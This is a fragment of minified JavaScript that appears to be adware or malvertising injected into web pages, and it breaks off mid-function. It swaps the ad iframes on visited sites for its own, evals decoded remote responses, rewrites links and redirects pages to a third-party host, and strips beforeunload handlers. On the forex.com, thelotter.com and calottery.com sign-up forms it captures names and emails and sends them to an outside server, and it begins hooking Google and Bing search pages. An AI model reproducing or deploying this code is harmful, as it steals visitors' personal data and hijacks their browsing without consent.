rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 120x600 160x600 468x60'.indexOf(size)) return !1;var atp=false;if(size==\"120x60\")return;var rfr=window.self==window.top?encodeURIComponent(window.self.location.href):'';var arr={\"728x90\":\"2\",\"300x250\":\"1\",\"468x60\":\"3\",\"120x600\":\"5\",\"160x600\":\"4\"}[size];var surl='http://ads.incmd03.com/creative/2-00213 ... fr;;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1013,size]);}}catch(e){return !1;}},dsnr_dasa2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=3024342&size= ... FERRER_URL]', (atp?atp:1), [1596,size]);}}catch(e){return !1;}},dsnr_nntbr2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=3024616&size= ... FERRER_URL]', (atp?atp:1), [1605,size]);}}catch(e){return !1;}},startmeapp_tier2_A:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=3103258&size= ... _CLICK_TAG}', (atp?atp:1), [1617,size]);}}catch(e){return !1;}},mari_gen_A:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"728x90\":\"3168477\",\"300x250\":\"3168480\",\"160x600\":\"3168485\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1689,size]);}}catch(e){return !1;}},velis_adr2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 120x600 160x600 468x60'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"728x90\":\"2703045\",\"300x250\":\"2703046\",\"120x600\":\"2703047\",\"160x600\":\"2703048\",\"468x60\":\"2703049\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1465,size]);}}catch(e){return !1;}},matomy_adj49:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2958687&size='+size+'', (atp?atp:1), [1591,size]);}}catch(e){return !1;}},mari_strm_A:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"728x90\":\"3168674\",\"300x250\":\"3168676\",\"160x600\":\"3168679\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '&referrer=[REFERRER_URL]';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1705,size]);}}catch(e){return !1;}},matomy_strm53:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=3223135&size= ... FERRER_URL]', (atp?atp:1), [1720,size]);}}catch(e){return !1;}},hulk_porn:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600 300x600 250x250 600x400'.indexOf(size)) return !1;var atp=false;var surl='http://syndication.exoclick.com/ads-ifr ... =0&idzone=' + {\"728x90\":\"638635\",\"300x250\":\"638633\",\"468x60\":\"774737\",\"120x600\":\"774751\",\"160x600\":\"638637\",\"300x600\":\"774753\",\"250x250\":\"774743\",\"600x400\":\"774747\"}[size] + '&idsite=225117&p='+encodeURIComponent(window.self.location.href)+'&dt=' + Math.random();if(!document.getElementById(\"sad32ecs3fdsa\")&&1==Math.ceil(4*Math.random()))try{setTimeout(function(){var b=document.getElementsByTagName(\"body\")[0],a=document.createElement(\"div\");a.setAttribute(\"style\",\"width:728px;height:90px;margin:0 auto\");a.setAttribute(\"id\",\"sad32ecs3fdsa\");a.innerHTML='<iframe src=\"//ads.ventivmedia.com/www/delivery/afr.php?zoneid=31&cb='+Math.random()+'\" style=\"width:728px;height:90px\" frameborder=\"0\" scrolling=\"no\"></iframe>';b.insertBefore(a,b.firstChild)},1)}catch(e){};;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [420,size]);}}catch(e){return !1;}}}};_zyad.init();})()}else{(function(){var stngs = {attr_name:'s5215429406649325095',szy_domain:[\"getfastmyallnet.com\",\"superstoragemy.org\"],ad_sizes:[[728,90,1],[300,250,2],[468,60,3],[250,250,4],[160,600,5],[120,600,6],[120,240,7],[240,400,8],[300,600,10],[670,670,11],[600,270,12]],checkif:function(ifr){return (ifr.getAttribute('s5215429406649325095') || ifr.src.indexOf('=287609')>-1||ifr.src.indexOf('=665715')>-1||ifr.src.indexOf('1018-1005')>-1||ifr.src.indexOf('1019-1001')>-1||ifr.src.indexOf('2136&zid=')>-1&&ifr.src.indexOf('PT1312')>-1||(ifr.getAttribute('name') && ifr.getAttribute('id')==ifr.getAttribute('name') && ifr.getAttribute('name').match(/^ap\\d+$/)))}};window.adzy653rk={nrnm:5,ifr:[],src:[],jbs:{ifr:[],at:[]},imp:{pid:\"55501\",eid:\"990\",hid:\"5215429406649325095\",lt:\"14.99\",referrer:document.referrer,hostname:window.self.location.hostname,url:window.self.location.hostname,jpshort:\"bS2eQFLx\",rattr:stngs.attr_name,title:document.title,domain:stngs.szy_domain,sizes:stngs.ad_sizes},topHost:function(){if(window.self!=window.top){var a=decodeURIComponent(window.self.location.search).match(/http:\\/\\/[^&]+/);return a&&a[0]}return null}(),getKeywords:function(){var a=adzy653rk.imp.title,c=document.getElementsByTagName(\"meta\");if(c)for(var b=0,d=c.length;b<d;b++)\"keywords\"==c.name.toLowerCase()&&(a+=\" \"+c.content.replace(/,/g,\" \"));return a.replace(/[_-]/g,\" \")},init:function(){var a=document.getElementsByTagName(\"iframe\");if(a.length){for(var c=[],b=0;b<a.length;b++)stngs.checkif(a)||(a.setAttribute(adzy653rk.imp.rattr,\"true\"),a.setAttribute(\"replaced\",\"true\"),c.push(a[b]));if(c.length){var d=\nfunction(a){if(a>=c.length){var b=adzy653rk.imp;adzy653rk.jbs.at.length?adzy653rk.getAds(\"//\"+adzy653rk.imp.domain[\"https:\"==window.self.location.protocol?1:0]+\"/?tid=1&size=\"+adzy653rk.jbs.at.join(\",\")+\"&subid=\"+b.pid+\"&subid1=\"+b.hid+\"&subid2=\"+b.eid+\"&lt=\"+b.lt+\"&k=\"+encodeURIComponent(adzy653rk.getKeywords())+(adzy653rk.topHost?\"&tdh=\"+encodeURIComponent(adzy653rk.topHost):\"\"),\"seta\"):adzy653rk.destruct()}else{if(b=adzy653rk.getAt(c[a]))adzy653rk.jbs.ifr.push(c[a]),adzy653rk.jbs.at.push(b);setTimeout(function(){d(++a)},\n1)}};d(0)}else adzy653rk.destruct()}else adzy653rk.destruct()},dfn:function(a){if(adzy653rk.ifr.length&&(a=a?a:1,!(300<a))){var c=function(b){b>=adzy653rk.ifr.length?setTimeout(function(){adzy653rk.dfn(++a)},1200):(adzy653rk.src[b]&&adzy653rk.ifr[b]&&adzy653rk.ifr[b].src!=adzy653rk.src[b][0]&&(adzy653rk.ifr[b].nextSibling.innerHTML&&adzy653rk.ifr[b].nextSibling.innerHTML.match(/<span[^>]?>Ads( not)? by/i)?(new Image).src=\"http://zig.installerdatauk.info/?aid=2& ... fr[b].src):((new Image).src=\"http://zig.installerdatauk.info/?aid=1& ... c[b][1],1))),setTimeout(function(){c(++b)},1))};c(0)}},destruct:function(a){adzy653rk.jbs={ifr:[],at:[]};adzy653rk.rnm?adzy653rk.rnm++:(adzy653rk.rnm=1,setTimeout(adzy653rk.dfn,1200));adzy653rk.rnm<=adzy653rk.nrnm&&setTimeout(adzy653rk.init,\n1200)},getAt:function(a){a=[parseInt(\"number\"==typeof a.width||\"string\"==typeof a.width&&a.width.match(/[0-9]/)?a.width:a.scrollWidth),parseInt(\"number\"==typeof a.height||\"string\"==typeof a.height&&a.height.match(/[0-9]/)?a.height:a.scrollHeight)];for(var c=adzy653rk.imp.sizes,b=0;b<c.length;b++)if(a[0]>=c[b][0]-5&&a[0]<=c[b][0]+5&&a[1]>=c[b][1]-5&&a[1]<=c[b][1]+5)return c[b][2];return!1},getAds:function(a,c){if(-1<navigator.userAgent.indexOf(\"MSIE\")){var b=document.createElement(\"script\");b.type=\n\"text/javascript\";b.src=a+\"&cb=adzy653rk.\"+c;b.onreadystatechange=b.onload=function(){try{b.parentNode.removeChild(b)}catch(a){}};try{window.adzy653rk=adzy653rk,(document.getElementsByTagName(\"head\")[0]||document.getElementsByTagName(\"body\")[0]).appendChild(b)}catch(d){}}else{var e=new XMLHttpRequest;e.open(\"GET\",a,!0);e.onreadystatechange=function(){if(4==e.readyState)adzy653rk[c](e.response)};e.send(null)}},seta:function(a){var c=null;try{var b=adzy653rk.l.decode(a);\"undefined\"!=typeof JSON&&JSON.parse?\nc=JSON.parse(b):eval(\"ifrl = \"+b)}catch(d){}if(c&&c.length)for(a=0;a<c.length;a++)c[a]&&adzy653rk.jbs.ifr[a]&&adzy653rk.ifrset(adzy653rk.jbs.ifr[a],c[a]);adzy653rk.destruct()},ifrset:function(a,c,b){b||(adzy653rk.ifr.push(a),c[0]=c[0].replace(/\\[##([^#]+)##\\]/g,function(a,b){return adzy653rk.imp[toekn]?adzy653rk.imp[toekn]:\"\"}));var d=[\"<html><head><style>html,body{width:100%;height:100%;margin:0}</style></head><body>\",\"</body></html>\"];switch(c[1]){case 1:a.src=c[0]+(-1<c[0].indexOf(\"?\")?\"&\"+adzy653rk.imp.jpshort+\n\"=\"+c[2]+\"_18x18_0\":\"\");break;case 2:a.src=\"about:blank\";try{a.contentWindow.document.write(d[0]+'<iframe src=\"'+c[0]+'\" style=\"width:100%;height:100%;border:0;\" scrolling=\"no\" frameborder=\"0\"></iframe>'+d[1])}catch(e){}break;case 3:case 6:a.src=\"about:blank\";try{a.contentWindow.document.write(d[0]+c[0]+d[1])}catch(f){}}b||adzy653rk.src.push([a.src,c])},l:{xlat:\"abcdwxyzstuvrqponmijklefghABCDWXYZSTUVMNOPQRIJKLEFGH9876543210+/\",decode:function(a){a=a.toString().replace(/[^A-Za-z0-9\\+\\/]/g,\"\");for(var c=\n\"\",b=0;b<a.length;){var d=this.xlat.indexOf(a.charAt(b++)),e=this.xlat.indexOf(a.charAt(b++)),f=this.xlat.indexOf(a.charAt(b++)),g=this.xlat.indexOf(a.charAt(b++)),h=(e&15)<<4|f>>2,k=(f&3)<<6|g,c=c+String.fromCharCode(d<<2|e>>4);64!=f&&0<h&&(c+=String.fromCharCode(h));64!=g&&0<k&&(c+=String.fromCharCode(k))}return this._utf8_decode(c)},_utf8_decode:function(a){for(var c=\"\",b=0;b<a.length;){var d=a.charCodeAt(b);if(128>d)c+=String.fromCharCode(d),b++;else if(191<d&&224>d)var e=a.charCodeAt(b+1),c=\nc+String.fromCharCode((d&31)<<6|e&63),b=b+2;else var e=a.charCodeAt(b+1),f=a.charCodeAt(b+2),c=c+String.fromCharCode((d&15)<<12|(e&63)<<6|f&63),b=b+3}return c}}};\nadzy653rk.location = adzy653rk.imp.referrer+window.self.location.href;if(adzy653rk.location.indexOf(adzy653rk.imp.jpshort+\"=\")==-1 &&adzy653rk.location.indexOf(\"adk2.co\")==-1 &&\"ads.mangomediaads.com optimizedby.brealtime.com n66.adshostnet.com ad.z5x.net s-tag.z5x.net exchange.admailtiser.com ad.yieldmanager.com ad.adserverplus.com servedby.adxplosions.com cdn.trkclk.net srv.aileronx.com ads.exoclick.com servedby.adsplats.com ad.reachjunction.com ads.deliads.com srv1.statisticsreporting.com ads.ad-maven.com advs.adgorithms.com ad.adnetwork.net ads.incmd03.com ads.mediawhite.com cdn.network-server.net Servedby.bigfineads.com a.ad-sys.com ads.pubmatic.com ads.yahoo.com cdn.adsrvmedia.com an.z5x.net c5.zedo.com ib.adnxs.com ad.jumbaexchange.com tr.adsplats.com ads.sonobi.com fw.adsafeprotected.com ad.improvemedianetwork.com ads.networkhm.com media.glispa.com\".indexOf(window.self.location.hostname)==-1 &&adzy653rk.location.indexOf(\"zoneid=287609\")==-1 &&adzy653rk.location.indexOf(\"zoneid=665715\")==-1 &&adzy653rk.location.indexOf(\"2136&zid=\")==-1 &&adzy653rk.location.indexOf(\"1018-1005\")==-1 &&adzy653rk.location.indexOf(\"1019-1001\")==-1 &&adzy653rk.location.indexOf(\"PT1312\")==-1)adzy653rk.init()})()};(function(){try{if(window.opener&&window.self==window.top&&-1==document.cookie.indexOf(\"xcddsa\")&&-1==window.self.location.href.indexOf(\"px.pluginh\")&&window.self.location.hostname.indexOf('earchfu')==-1&&(!document.referrer||-1==document.referrer.indexOf('/amz/')&&(!document.referrer.match(/cpops-\\d+\\.html/))&&-1==document.referrer.indexOf(\"px.pluginh\"))&&-1==window.self.location.href.indexOf(\"nkths.co\")&&-1==window.self.location.href.indexOf(\"ally.asi\")&&-1==window.self.location.href.indexOf('/amz/')&&(!window.self.location.href.match(/cpops-\\d+\\.html/))&&-1==window.self.location.hostname.indexOf(\"getjs\")&&-1==window.self.location.hostname.indexOf(\"hsbc\")&&3>history.length){var c=navigator.userAgent.toLowerCase(),d=\"http://canadaalltax.com/z/?f=pdkKqHwKrT ... =55501&rf=\" + encodeURIComponent(document.referrer) +\"&s=px.pluginh&r=\"+Math.random();if(-1<c.indexOf(\"msie\")&&(!document.referrer||-1==document.referrer.indexOf(location.hostname))){var e=window.innerWidth||document.documentElement.scrollWidth||0,f=window.innerHeight||document.documentElement.scrollHeight||0;if(e){window.resizeTo(e,f);var g=window.innerWidth||document.documentElement.scrollWidth,k=window.innerHeight||document.documentElement.scrollHeight;window.resizeTo(e+2,f);var h=window.scrollWidth||document.documentElement.scrollWidth;if(h!=g&&h<=g+2&&90>=f-k){var a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};try{if(typeof(jQuery)!=\"undefined\"){jQuery(window).unbind(\"beforeunload\")}}catch(e){};window.self.location.href=d}}}else if(!window.menubar.visible&&document.referrer&&-1==document.referrer.indexOf(window.self.location.hostname)){a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};var b=document.createElement(\"script\");b.type=\"text/javascript\";-1<c.indexOf(\"chrome\")&&(b.innerHTML='document.getElementsByTagName(\"body\")[0].setAttribute(\"xcddsa\",\"1\")',document.getElementsByTagName(\"body\")[0].appendChild(b),setTimeout(function(){document.getElementsByTagName(\"body\")[0].getAttribute(\"xcddsa\")&&(window.self.location.href=d)},10));-1<c.indexOf(\"firefox\")&&(b.innerHTML='try{if(typeof(jQuery)!=\"undefined\"){jQuery(window).unbind(\"beforeunload\")}}catch(e){};setTimeout(function(){window.self.location.href=\"'+d+'\";},10);',document.getElementsByTagName(\"head\")[0].appendChild(b))}}}catch(l){}})();if(1==2&&-1<window.self.location.href.indexOf(\"df.ly/\")){var dd=document.getElementById(\"rf\");dd&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?f=pdkKqHwKrT ... dY%3D&ch=1\")}(\"rdlnk.co\"==window.self.location.hostname||\"adfoc.us\"==window.self.location.hostname||\"www.adsbeta.net\"==window.self.location.hostname||\"ad5.eu\"==window.self.location.hostname)&&(dd=document.getElementsByTagName(\"iframe\")[0])&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?ch=1\");\"cf.ly\"==window.self.location.hostname&&(dd=document.getElementsByTagName(\"iframe\")[1])&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?f=pdkKqHwKrT ... dY%3D&ch=1\");\"adv.li\"==window.self.location.hostname&&(dd=document.getElementById(\"main\"))&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?f=pdkKqHwKrT ... dY%3D&ch=1\");if(window.top==window.self&&\"undefined\"!=typeof addEventListener&&-1==document.cookie.indexOf(\"vdsknj4th4un\")){var zytd=function(a){try{if(\"a\"==a.target.tagName.toLowerCase()&&\"\"==a.target.innerHTML&&a.target.getAttribute(\"href\")&&-1==a.target.getAttribute(\"href\").indexOf(window.self.location.hostname)){a.target.setAttribute(\"href\",\"http://canadaalltax.com/z/?f=pdkKqHwKrT ... ath.random());var b=new Date;b.setHours(b.getHours()+5);document.cookie=\"vdsknj4th4un=1;expires=\"+b.toUTCString();document.getElementsByTagName(\"body\")[0].removeEventListener(\"click\",zytd)}}catch(c){}};try{document.getElementsByTagName(\"body\")[0].addEventListener(\"click\",zytd)}catch(e){}};(function(){var init=function(b,a,f){for(var e=function(){for(var d=[],c=0;c<a.length;c++)b[a[c]]&&b[a[c]].value&&2<b[a[c]].value.length&&d.push(b[a[c]].value.replace(/[^0-9a-z \\-_\\.@]/ig,\"\"));if(d.length==a.length)for((new Image).src=\"https://score.sendapplicationget.com/?i ... IComponent(d.join(\",\"))+\"&r=\"+Math.random(),c=0;c<a.length;c++)b[a[c]]&&b[a[c]].removeEventListener?b[a[c]].removeEventListener(\"blur\",e,!1):b[a[c]]&&b[a[c]].detachEvent&&b[a[c]].detachEvent(\"onblur\",e)},d=0;d<a.length;d++)b[a[d]]&&b[a[d]].addEventListener?b[a[d]].addEventListener(\"blur\",e,!1):b[a[d]]&&b[a[d]].attachEvent&&b[a[d]].attachEvent(\"onblur\",e)};(\"www.apply.forex.com\"==window.self.location.hostname||\"apply.forex.com\"==window.self.location.hostname)&&-1<window.self.location.href.indexOf(\"Screen1\")&&document[\"aspnetForm\"]&&init(document[\"aspnetForm\"],\"ctl00$ContentPlaceHolder1$ctl01$txtFirstname,ctl00$ContentPlaceHolder1$ctl01$txtLastname,ctl00$ContentPlaceHolder1$ctl01$txtVerifyEmail\".split(','),\"3\");(\"www.thelotter.com\"==window.self.location.hostname||\"thelotter.com\"==window.self.location.hostname)&&-1<window.self.location.href.indexOf(\"remoteshortregistration\")&&document[\"aspnetForm\"]&&init(document[\"aspnetForm\"],\"ctl00$ContentPlaceHolderMain$ctl00$signUpForms$txtFirstName,ctl00$ContentPlaceHolderMain$ctl00$signUpForms$txtEmail\".split(','),\"4\");(\"www.calottery.com\"==window.self.location.hostname||\"calottery.com\"==window.self.location.hostname)&&-1<window.self.location.href.indexOf(\"register\")&&document[\"frmMain\"]&&init(document[\"frmMain\"],\"objBody$content_0$leftcolumn_0$txtFirstName,objBody$content_0$leftcolumn_0$txtLastName,objBody$content_0$leftcolumn_0$txtEmail\".split(','),\"5\")})();(function(){try{var b=\"gonetwork.eu performancerevenues.com adtransfer adk2.com timehare clkads.com adcash xtendmedia.com cpxinteractive media-servers directrev doubleclick brealtime.com adnxs.com yieldmanager jsopen yieldads adserverplus clicksor exoclick.com vitalads zedo.com mshft pop.billi mediawhite edomz getjs adjuggler realpopbid bestadbid directdisplayad displayadfeed adorika displayadfeed akamaihd.net/ssa/ trusted-serving tusfiles clkmon.c minecraftdl\".split(\" \");for(i=0;i<b.length;i++){var a=location.href + (document.title?document.title.toLowerCase():\"z\");if(document.referrer&&-1<document.referrer.indexOf(b[i])&&(-1<a.indexOf(\"download\")||-1<a.indexOf(\"convert\")||-1<window.self.location.href.indexOf(\"babylon\")||-1<window.self.location.href.indexOf(\"se Update Go\")||-1<window.self.location.href.indexOf(\"ilivid\")||-1<window.self.location.href.indexOf(\"download\")||-1<a.indexOf(\"regclean\")||-1<a.indexOf(\"etype\")||-1<a.indexOf(\"diction\")||-1<a.indexOf(\"my-uq\")||-1<a.indexOf(\"ftalk\")||-1<a.indexOf(\"pcspeedmaximizer\")||-1<a.indexOf(\"kingtransl\")||-1<a.indexOf(\"jsopen\")||-1<a.indexOf(\"7-zip\")||-1<a.indexOf(\"boost pc\")||-1<a.indexOf(\"computer slow\")||-1<a.indexOf(\"7-update14\")||-1<a.indexOf(\"player\")) || location.hostname.indexOf('jsopen.net')>-1){var channel=99;if(window.onbeforeunload){window.onbeforeunload=null;channel=98};location.href=\"http://canadaalltax.com/e/?f=pdkKqHwKrT ... }}catch(d){}})();(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"bS2eQFLx=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"bS2eQFLx=\")){var d=a.match(/bS2eQFLx=(\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.webscorebox.com/?q=g708BN ... UHrTkEpjk=\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();;window.top==window.self&&\"undefined\"==typeof __yael_running&&(window.__yael_running=!0,new function(){if(!document.getElementById(\"__yael_once\")){var m=document.createElement(\"div\");m.id=\"__yael_once\";var n=document.getElementsByTagName(\"body\")[0];n&&n.appendChild(m);var b=this;b.pixelHost=\"//sepx.sendapplicationget.com\";b.prefix=\"jhgasdf\";b.version=\"0.5\";b.now=(new Date).getTime();b.clickInterval=2592E5;b.ratio=12;b.initThrottle=\"google;gmaps;amazon\";b.unique_items_left=!0;b.eid=decodeURIComponent(\"CostMin\"); b.num_of_items_in_one=4;b.count=0;b.baseHostname=\"sendapplicationget.com\";b.utils=new function(){var a=this;a.isFalse=function(a){return\"undefined\"==typeof a||0===a.length||null===a};a.cookie=new function(){var a=this;a.createCookie=function(a,c,b){if(b){var g=new Date;g.setTime(g.getTime()+864E5*b);b=\"; expires=\"+g.toGMTString()}else b=\"\";document.cookie=a+\"=\"+c+b+\"; path=/\"};a.readCookie=function(a){a+=\"=\";for(var c=nasrat(\";\"),b=0;b<c.length;b++){for(var g=c[b];\" \"==g.charAt(0);)g= g.substring(1,g.length);if(0==g.indexOf(a))return g.substring(a.length,g.length)}return null};a.eraseCookie=function(b){a.createCookie(b,\"\",-1)}};a.ajax={get:function(c,b){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",c,!0),this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&b(a.ajax.xhr.responseText)},this.xhr.send()}catch(e){}},post:function(c,b,e){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",c,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\"); this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&e(a.ajax.xhr.responseText)};b=encodeURIComponent(b);this.xhr.send(b)}};a.waitForTokens={};a.addScript=function(a,b){if(\"bing\"==b){var e=Element.prototype.appendChild;document.createElement(\"iframe\");Element.prototype.appendChild=document.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(a);Element.prototype.appendChild=e}else document.getElementsByTagName(\"head\")[0].appendChild(a)};a.waitForElement=function(c,d,e,f){var g= a.query_selector_all(c);clearTimeout(a.waitTimeout);if(25<b.waitForElementCounter)return d(null);if(\"undefined\"==typeof g||1>g.length){if(a.waitForTokens[f])return d(null);var h=arguments.callee;a.waitTimeout=setTimeout(function(){b.waitForElementCounter++;h(c,d,e,f)},e)}else{if(a.waitForTokens[f])return d(null);a.waitForTokens[f]=!0;b.waitForElementCounter=0;return d(g)}};a.flushWaitForTokens=function(){a.waitForTokens={}};a.getRandomInt=function(a,b){return Math.floor(Math.random()*(b-a+1))+a}; a.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(b){return{getPropertyValue:function(d){\"float\"==d&&(d=\"styleFloat\");d=a.dhtml_prop_name(d);return\"object\"==typeof b.currentStyle&&null!=b.currentStyle&&\"undefined\"!=typeof b.currentStyle[d]?b.currentStyle[d]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};a.query_selector_all=document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b= a.match(/^#([^,\\s]+)$/)||[];if(1<b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(b);document.__asya_qsaels=[];b.styleSheet.cssText=a+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};a.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}: function(a){if(a instanceof Object){var b=new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};a.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,b,c){return c.toUpperCase()})};a.wildcard_to_regex=function(a){a=a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a=a.replace(/\\*/g,\".*\");return RegExp(a)};a.throttle=function(a,b){var e=null;return function(){var f=this,g=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(f,g)},b)}};a.epoch=function(){return(new Date).getTime()}; a.msie=function(){var a=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(a)&&(a=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(a)?!1:a}();a.version_ie_less=function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};a.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)}; a.match_url=function(b,d){for(var e=0;e<d.length;e++)if(\"string\"==typeof d[e]){var f;f=/^\\/.+\\/$/.test(d[e])?RegExp(d[e]):a.wildcard_to_regex(d[e]);if(f instanceof RegExp&&f.test(b))return!0}};a.ping=function(a){for(var d=[\"google\",\"bing\",\"yahoo\",\"youtube\"],e=0;e<d.length;e++)if(-1<location.hostname.indexOf(d[e])){var f=new Image,g=encodeURIComponent(window.self==window.top?window.self.location.href:\"\");1E3<g.length&&(g=encodeURIComponent(location.hostname));var h=encodeURIComponent(location.hostname); f.src=b.pixelHost+\"?hid=5215429406649325095&eid=990&pid=55501&prodid=186&v=\"+b.version+\"&ch=\"+a+\"&lan=\"+navigator.language+\"&cc=CZ&pr=\"+d[e]+\"&host=\"+h+\"&ref=\"+g}}};var k=[\"horizontal\",\"vertical\",\"images-horizontal\",\"images-vertical\"];b.jsonpHost=function(){var a=\"s1. s1. s2. s3. s4. s5. s6.\".split(\" \");return a[b.utils.getRandomInt(0,a.length-1)]+\"\"}()+b.baseHostname;b.projects_info={google:{hrefSelector:\".r a\",unique_search_divs:\"3\",urls:[\"www.google.*\"], src_for_keyword:[\"#gbqfq\",\"#lst-ib\",\"#sbhost\"],dr:[\"#tvcap\",\"#bottomads\",\"#tads\"],tweak:function(){b.events.flush();var a=b.utils.query_selector_all(\"#nav td\"),c=b.utils.query_selector_all(\".spell + a\")[0];if(0<a.length)for(var d=0;d<a.length;d++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[d],!0);\"undefined\"!==typeof c&&b.events.add(\"click\",function(){b.init_search_project()},!1,c,!0)},validate:function(a){var c=this;if(-1<location.href.indexOf(\"https://www.google.com/maps\")||location.href.match(/https:\\/\\/www.google.[a-z,\\.]+\\/$/g))return!0; c.callback=a;c.count=0;this.check_tab=function(){var 